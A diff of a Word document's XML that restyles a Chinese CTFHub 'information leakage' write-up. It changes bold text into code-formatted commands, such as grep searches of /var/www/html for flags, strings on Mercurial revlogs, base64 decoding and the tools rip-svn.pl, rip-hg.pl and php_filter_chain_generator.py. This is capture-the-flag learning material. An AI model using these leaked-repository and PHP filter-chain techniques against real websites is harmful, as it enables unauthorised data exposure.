+        <w:t>nl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>rev</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -449,26 +478,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`base64`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：编码输出 —— </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>避开 HTML 特殊字符的神器</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>base64</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：编码输出 —— 避开 HTML 特殊字符的神器</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -477,26 +498,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`grep -r "ctfhub" /var/www/html/`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>按内容找文件（最准）</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>grep -r "ctfhub" /var/www/html/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：按内容找文件（最准）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -505,11 +518,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`xxd` / `od`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>xxd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>od</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -525,11 +553,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`strings`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>strings</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -560,11 +588,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`grep -r ctfhub /var/www/html/`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>grep -r ctfhub /var/www/html/</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -580,11 +608,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`grep -ro "ctfhub{[^}]*}" /`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>grep -ro "ctfhub{[^}]*}" /</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -600,11 +628,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`strings .hg/store/00changelog.i`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>strings .hg/store/00changelog.i</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -620,11 +648,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`od -A d -t x1z file`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>od -A d -t x1z file</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -655,26 +683,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`base64 -d`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>解码（GNU 版宽容，会自动跳过非 base64 字符）</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>base64 -d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：解码（GNU 版宽容，会自动跳过非 base64 字符）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -683,11 +703,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`openssl base64 -d`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>openssl base64 -d</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -703,11 +723,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`grep -oE '^[A-Za-z0-9+/=]+'`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>grep -oE '^[A-Za-z0-9+/=]+'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -723,11 +743,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`sed 's/&lt;.*//'` / `cut -d'&lt;' -f1`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>sed 's/&lt;.*//'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>cut -d'&lt;' -f1</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -743,11 +778,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`awk '{print $4"\t"$2}'`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>awk '{print $4"\t"$2}'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -763,11 +798,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`comm -23 &lt;(...) &lt;(...)`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>comm -23 &lt;(...) &lt;(...)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -783,11 +818,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`tr -d '\000'`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>tr -d '\000'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -818,11 +853,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`git`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>git</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -838,11 +873,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`sqlite3`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>sqlite3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -866,18 +901,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`hg`（mercurial）</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：读 HG 的 revlog</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>hg</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（mercurial）：读 HG 的 revlog</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -886,11 +921,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`svn`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>svn</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -906,11 +941,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`rip-svn.pl` / `rip-hg.pl`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>rip-svn.pl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>rip-hg.pl</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -926,11 +976,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`php_filter_chain_generator.py`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>php_filter_chain_generator.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -999,7 +1049,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>CTFHub「信息泄露」模块 9 题全部通关：</w:t>
@@ -1012,7 +1061,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>1</w:t>
@@ -1069,7 +1117,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>2</w:t>
@@ -1126,7 +1173,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>3</w:t>
@@ -1198,7 +1244,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>4</w:t>
@@ -1255,7 +1300,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>5</w:t>
@@ -1320,7 +1364,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>6</w:t>
@@ -1385,7 +1428,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>7</w:t>
@@ -1442,7 +1484,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>8</w:t>
@@ -1522,7 +1563,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>9</w:t>
@@ -1609,7 +1649,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>另有两道独立复现（非模块题，用于验证"不是抄 WP"）：</w:t>
@@ -1622,7 +1661,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>Git Log 独立复现</w:t>
@@ -1667,7 +1705,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>Git Stash 独立复现</w:t>
@@ -1712,7 +1749,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>HG 第二实例</w:t>
@@ -1757,7 +1793,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>第一轮（更早的记录，同模块）：</w:t>
@@ -1880,26 +1915,7 @@
           <w:color w:val="555555"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>四道题的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>命令就是解法</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>。每段代码照抄即可复现，注释里标了每一步在干什么。</w:t>
+        <w:t>四道题的命令就是解法。每段代码照抄即可复现，注释里标了每一步在干什么。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2027,17 +2043,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>判据</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2122,17 +2130,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2254,17 +2254,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>判据</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：reflog 变成 4 条，多出来的那行是 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">判据：reflog 变成 4 条，多出来的那行是 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2304,17 +2296,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>补一条取 flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>补一条取 flag：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2343,17 +2327,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2629,17 +2605,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>判据</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2664,17 +2632,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：本地复刻 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">flag：本地复刻 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2887,17 +2847,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>判据</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>判据：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2922,17 +2874,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>两个关键</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">：文件名里的 </w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">两个关键：文件名里的 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2987,17 +2931,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>flag</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>flag：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3414,7 +3350,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>六个载体：</w:t>
@@ -3427,17 +3362,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
